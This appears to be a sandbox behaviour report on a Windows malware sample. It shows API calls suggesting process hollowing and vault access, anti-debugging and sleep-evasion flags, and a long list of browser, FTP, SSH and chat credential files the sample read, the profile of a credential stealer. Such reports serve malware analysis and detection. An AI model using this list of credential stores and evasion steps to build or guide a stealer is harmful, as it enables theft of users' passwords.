- DynamicLoader: KERNEL32.dll/GetFileAttributesEx
- DynamicLoader: KERNEL32.dll/GetFileAttributesExW
- DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
- DynamicLoader: mscoreei.dll/LoadLibraryShim
- DynamicLoader: culture.dll/ConvertLangIdToCultureName
- DynamicLoader: KERNEL32.dll/lstrlen
- DynamicLoader: KERNEL32.dll/lstrlenW
- DynamicLoader: MSCOREE.DLL/ND_RI4
- DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
- DynamicLoader: mscoreei.dll/ND_RI4
- DynamicLoader: KERNEL32.dll/VirtualProtect
- DynamicLoader: KERNEL32.dll/GlobalMemoryStatusEx
- DynamicLoader: KERNEL32.dll/VirtualProtect
- DynamicLoader: KERNEL32.dll/GetEnvironmentVariable
- DynamicLoader: KERNEL32.dll/GetEnvironmentVariableW
- DynamicLoader: KERNEL32.dll/SwitchToThread
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/GetCurrentProcessId
- DynamicLoader: KERNEL32.dll/GetCurrentProcessIdW
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
- DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
- DynamicLoader: KERNEL32.dll/GetCurrentProcess
- DynamicLoader: ADVAPI32.dll/OpenProcessToken
- DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
- DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/CloseHandle
- DynamicLoader: KERNEL32.dll/OpenProcess
- DynamicLoader: KERNEL32.dll/OpenProcessW
- DynamicLoader: psapi.dll/EnumProcessModules
- DynamicLoader: psapi.dll/EnumProcessModulesW
- DynamicLoader: psapi.dll/GetModuleInformation
- DynamicLoader: psapi.dll/GetModuleInformationW
- DynamicLoader: psapi.dll/GetModuleBaseName
- DynamicLoader: psapi.dll/GetModuleBaseNameW
- DynamicLoader: psapi.dll/GetModuleFileNameEx
- DynamicLoader: psapi.dll/GetModuleFileNameExW
- DynamicLoader: KERNEL32.dll/GetProcAddress
- DynamicLoader: KERNEL32.dll/DebugActiveProcess
- DynamicLoader: KERNEL32.dll/WaitForDebugEvent
- DynamicLoader: KERNEL32.dll/ContinueDebugEvent
- DynamicLoader: KERNEL32.dll/DeleteFileA
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: ADVAPI32.dll/SetKernelObjectSecurity
- DynamicLoader: ADVAPI32.dll/GetKernelObjectSecurity
- DynamicLoader: ntdll.dll/NtSetInformationProcess
- DynamicLoader: KERNEL32.dll/VirtualProtect
- DynamicLoader: ntdll.dll/NtProtectVirtualMemory
- DynamicLoader: KERNEL32.dll/GetProcAddress
- DynamicLoader: KERNEL32.dll/VirtualAllocEx
- DynamicLoader: KERNEL32.dll/GetThreadContext
- DynamicLoader: KERNEL32.dll/Wow64GetThreadContext
- DynamicLoader: ntdll.dll/NtUnmapViewOfSection
- DynamicLoader: KERNEL32.dll/ResumeThread
- DynamicLoader: KERNEL32.dll/SetThreadContext
- DynamicLoader: KERNEL32.dll/Wow64SetThreadContext
- DynamicLoader: ntdll.dll/NtProtectVirtualMemory
- DynamicLoader: KERNEL32.dll/WriteProcessMemory
- DynamicLoader: KERNEL32.dll/ReadProcessMemory
- DynamicLoader: KERNEL32.dll/TerminateProcess
- DynamicLoader: KERNEL32.dll/IsWow64Process
- DynamicLoader: KERNEL32.dll/CreateProcessW
- DynamicLoader: KERNEL32.dll/CreateProcessWW
- DynamicLoader: ADVAPI32.dll/RegCloseKey
- DynamicLoader: ole32.dll/CoUninitialize
- DynamicLoader: KERNEL32.dll/CreateActCtxW
- DynamicLoader: KERNEL32.dll/AddRefActCtx
- DynamicLoader: KERNEL32.dll/ReleaseActCtx
- DynamicLoader: KERNEL32.dll/ActivateActCtx
- DynamicLoader: KERNEL32.dll/DeactivateActCtx
- DynamicLoader: KERNEL32.dll/GetCurrentActCtx
- DynamicLoader: KERNEL32.dll/QueryActCtxW
- DynamicLoader: ADVAPI32.dll/EventUnregister
- DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
- DynamicLoader: CRYPTSP.dll/CryptCreateHash
- DynamicLoader: CRYPTSP.dll/CryptHashData
- DynamicLoader: CRYPTSP.dll/CryptGetHashParam
- DynamicLoader: CRYPTSP.dll/CryptDestroyHash
- DynamicLoader: CRYPTSP.dll/CryptReleaseContext
- DynamicLoader: vaultcli.dll/VaultEnumerateItems
- DynamicLoader: vaultcli.dll/VaultEnumerateVaults
- DynamicLoader: vaultcli.dll/VaultFree
- DynamicLoader: vaultcli.dll/VaultGetItem
- DynamicLoader: vaultcli.dll/VaultOpenVault
- DynamicLoader: vaultcli.dll/VaultCloseVault
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: NETAPI32.DLL/NetUserGetInfo
- DynamicLoader: CRYPTSP.dll/CryptImportKey
- DynamicLoader: CRYPTSP.dll/CryptSetKeyParam
- DynamicLoader: CRYPTSP.dll/CryptDecrypt
- DynamicLoader: CRYPTSP.dll/CryptDestroyKey
- DynamicLoader: NETAPI32.DLL/NetUserGetInfo
- DynamicLoader: NETAPI32.DLL/NetUserGetInfo
- DynamicLoader: ole32.dll/CoInitializeEx
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: ole32.dll/CoInitializeSecurity
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: ole32.dll/CoCreateInstance
- DynamicLoader: kernel32.dll/SortGetHandle
- DynamicLoader: kernel32.dll/SortCloseHandle
- DynamicLoader: fntcache.dll/ServiceMain
- DynamicLoader: fntcache.dll/SvchostPushServiceGlobals
- DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
- DynamicLoader: CRYPTBASE.dll/SystemFunction036
- DynamicLoader: sechost.dll/LookupAccountNameLocalW
- DynamicLoader: ADVAPI32.dll/LookupAccountSidW
- DynamicLoader: sechost.dll/LookupAccountSidLocalW
- DynamicLoader: uxtheme.dll/ThemeInitApiHook
- DynamicLoader: USER32.dll/IsProcessDPIAware
- DynamicLoader: dwmapi.dll/DwmIsCompositionEnabled
- DynamicLoader: RPCRT4.dll/UuidFromStringW
- DynamicLoader: radarrs.dll/WdiDiagnosticModuleMain
- DynamicLoader: radarrs.dll/WdiHandleInstance
- DynamicLoader: radarrs.dll/WdiGetDiagnosticModuleInterfaceVersion
- DynamicLoader: wkscli.dll/NetGetJoinInformation
- DynamicLoader: netutils.dll/NetApiBufferFree
A process attempted to delay the analysis task.
Severity: Medium
Confidence: Very High
- Process: 98765123.exe tried to sleep 662 seconds, actually delayed analysis time by 0 seconds
Guard pages use detected - possible anti-debugging.
Severity: Medium
Confidence: Very High
Creates RWX memory
Severity: Medium
Confidence: Medium
SetUnhandledExceptionFilter detected (possible anti-debug)
Severity: Low
Confidence: Very High
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven05b_64 | Seven05b_64 | VirtualBox | 2018-09-09 19:38:39 | 2018-09-09 19:41:48 | 189 |
10 Summary items with data
Files
C:\Windows\System32\MSCOREE.DLL.local C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll C:\Windows\Microsoft.NET\Framework\* C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll C:\Users\Seven01\AppData\Local\Temp\98765123.exe.config C:\Users\Seven01\AppData\Local\Temp\98765123.exe C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll C:\Users\Seven01\AppData\Local\Temp\98765123.exe.Local\ C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll C:\Windows C:\Windows\winsxs C:\Windows\Microsoft.NET\Framework\v4.0.30319 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI C:\Users C:\Users\Seven01 C:\Users\Seven01\AppData C:\Users\Seven01\AppData\Local C:\Users\Seven01\AppData\Local\Temp C:\Windows\System32\l_intl.nls C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll \Device\KsecDD C:\Users\Seven01\AppData\Local\Temp\98765123.INI C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll C:\Windows\assembly\pubpol28.dat C:\Windows\assembly\GAC\PublisherPolicy.tme C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI C:\Windows\Globalization\it-it.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp C:\Users\Seven01\AppData\Local\Temp\it-IT\98765123.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\98765123.resources\98765123.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\98765123.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\98765123.resources\98765123.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll C:\Windows\Globalization\it.nlp C:\Users\Seven01\AppData\Local\Temp\it\98765123.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\98765123.resources\98765123.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\98765123.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\98765123.resources\98765123.resources.exe C:\Windows\Globalization\en-us.nlp C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089 C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089 C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2752.3734578 C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2752.3734578 C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2752.3734671 C:\Program Files\NETGATE\Black Hawk C:\Program Files (x86)\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE} C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalComodo\Dragon\Login Data C:\Users\Seven01\AppData\LocalComodo\Dragon\Default\Login Data C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Login Data C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalGoogle\Chrome\Login Data C:\Users\Seven01\AppData\LocalGoogle\Chrome\Default\Login Data C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalNichrome\Login Data C:\Users\Seven01\AppData\LocalNichrome\Default\Login Data C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalRockMelt\Login Data C:\Users\Seven01\AppData\LocalRockMelt\Default\Login Data C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalSpark\Login Data C:\Users\Seven01\AppData\LocalSpark\Default\Login Data C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalChromium\Login Data C:\Users\Seven01\AppData\LocalChromium\Default\Login Data C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalTitan Browser\Login Data C:\Users\Seven01\AppData\LocalTitan Browser\Default\Login Data C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalTorch\Login Data C:\Users\Seven01\AppData\LocalTorch\Default\Login Data C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Login Data C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Default\Login Data C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Login Data C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Default\Login Data C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalCocCoc\Browser\Login Data C:\Users\Seven01\AppData\LocalCocCoc\Browser\Default\Login Data C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalVivaldi\Login Data C:\Users\Seven01\AppData\LocalVivaldi\Default\Login Data C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalComodo\Chromodo\Login Data C:\Users\Seven01\AppData\LocalComodo\Chromodo\Default\Login Data C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalSuperbird\Login Data C:\Users\Seven01\AppData\LocalSuperbird\Default\Login Data C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalCoowon\Coowon\Login Data C:\Users\Seven01\AppData\LocalCoowon\Coowon\Default\Login Data C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalMustang Browser\Login Data C:\Users\Seven01\AppData\LocalMustang Browser\Default\Login Data C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Web Data C:\Users\Seven01\AppData\Local360Browser\Browser\Login Data C:\Users\Seven01\AppData\Local360Browser\Browser\Default\Login Data C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Login Data C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Login Data C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Default\Login Data C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalOrbitum\Login Data C:\Users\Seven01\AppData\LocalOrbitum\Default\Login Data C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Login Data C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Web Data C:\Users\Seven01\AppData\LocalIridium\Login Data C:\Users\Seven01\AppData\LocalIridium\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Login Data C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Login Data C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Web Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Login Data C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data C:\Users\Seven01\AppData\Local\QupZilla\profiles\default\browsedata.db C:\Users\Seven01\AppData\Roaming\Opera C:\Users\Seven01\AppData\Roaming\.purple\accounts.xml C:\Users\Seven01\Documents\SuperPutty C:\Program Files (x86)\FTPShell\ftpshell.fsi C:\Users\Seven01\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml C:\Program Files (x86)\oZone3D\MyFTP\myftp.ini C:\Users\Seven01\AppData\Roaming\FTPBox\profiles.conf C:\Program Files (x86)\Sherrod Computers\sherrod FTP\favorites C:\Program Files (x86)\FTP Now\sites.xml C:\Program Files (x86)\NexusFile\userdata\ftpsite.ini C:\Users\Seven01\AppData\Roaming\NexusFile\ftpsite.ini C:\Users\Seven01\Documents\NetSarang\Xftp\Sessions C:\Users\Seven01\AppData\Roaming\NetSarang\Xftp\Sessions C:\Program Files (x86)\EasyFTP\data C:\Users\Seven01\AppData\Roaming\SftpNetDrive C:\Program Files (x86)\AbleFTP7\encPwd.jsd C:\Program Files (x86)\AbleFTP7\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP7\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP8\encPwd.jsd C:\Program Files (x86)\AbleFTP8\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP8\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP9\encPwd.jsd C:\Program Files (x86)\AbleFTP9\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP9\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP10\encPwd.jsd C:\Program Files (x86)\AbleFTP10\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP10\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP11\encPwd.jsd C:\Program Files (x86)\AbleFTP11\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP11\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP12\encPwd.jsd C:\Program Files (x86)\AbleFTP12\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP12\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP13\encPwd.jsd C:\Program Files (x86)\AbleFTP13\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP13\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\AbleFTP14\encPwd.jsd C:\Program Files (x86)\AbleFTP14\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\AbleFTP14\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp7\encPwd.jsd C:\Program Files (x86)\JaSFtp7\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp7\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp8\encPwd.jsd C:\Program Files (x86)\JaSFtp8\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp8\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp9\encPwd.jsd C:\Program Files (x86)\JaSFtp9\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp9\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp10\encPwd.jsd C:\Program Files (x86)\JaSFtp10\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp10\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp11\encPwd.jsd C:\Program Files (x86)\JaSFtp11\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp11\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp12\encPwd.jsd C:\Program Files (x86)\JaSFtp12\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp12\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp13\encPwd.jsd C:\Program Files (x86)\JaSFtp13\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp13\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\JaSFtp14\encPwd.jsd C:\Program Files (x86)\JaSFtp14\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\JaSFtp14\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize7\encPwd.jsd C:\Program Files (x86)\Automize7\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize7\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize8\encPwd.jsd C:\Program Files (x86)\Automize8\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize8\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize9\encPwd.jsd C:\Program Files (x86)\Automize9\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize9\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize10\encPwd.jsd C:\Program Files (x86)\Automize10\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize10\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize11\encPwd.jsd C:\Program Files (x86)\Automize11\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize11\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize12\encPwd.jsd C:\Program Files (x86)\Automize12\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize12\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize13\encPwd.jsd C:\Program Files (x86)\Automize13\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize13\data\settings\ftpProfiles-j.jsd C:\Program Files (x86)\Automize14\encPwd.jsd C:\Program Files (x86)\Automize14\data\settings\sshProfiles-j.jsd C:\Program Files (x86)\Automize14\data\settings\ftpProfiles-j.jsd C:\Users\Seven01\AppData\Roaming\Cyberduck C:\Users\Seven01\AppData\Roaming\iterate_GmbH C:\Users\Seven01\.config\fullsync\profiles.xml C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.xml C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.cfg C:\Program Files (x86)\FileZilla\Filezilla.xml C:\Users\Seven01\AppData\Roaming\FileZilla\filezilla.xml C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml C:\Program Files (x86)\Staff-FTP\sites.ini C:\Users\Seven01\AppData\Roaming\BlazeFtp\site.dat C:\Program Files (x86)\Fastream NETFile\My FTP Links C:\Program Files (x86)\GoFTP\settings\Connections.txt C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat C:\Program Files (x86)\DeluxeFTP\sites.xml C:\Windows\wcx_ftp.ini C:\Users\Seven01\AppData\Roaming\wcx_ftp.ini C:\Users\Seven01\wcx_ftp.ini C:\Users\Seven01\AppData\Roaming\GHISLER\wcx_ftp.ini C:\Program Files (x86)\FTPGetter\Profile\servers.xml C:\Users\Seven01\AppData\Roaming\FTPGetter\servers.xml C:\Program Files (x86)\WS_FTP\WS_FTP.INI C:\Windows\WS_FTP.INI C:\Users\Seven01\AppData\Roaming\Ipswitch C:\Users\Seven01\site.xml C:\Users\Seven01\AppData\Local\PokerStars* 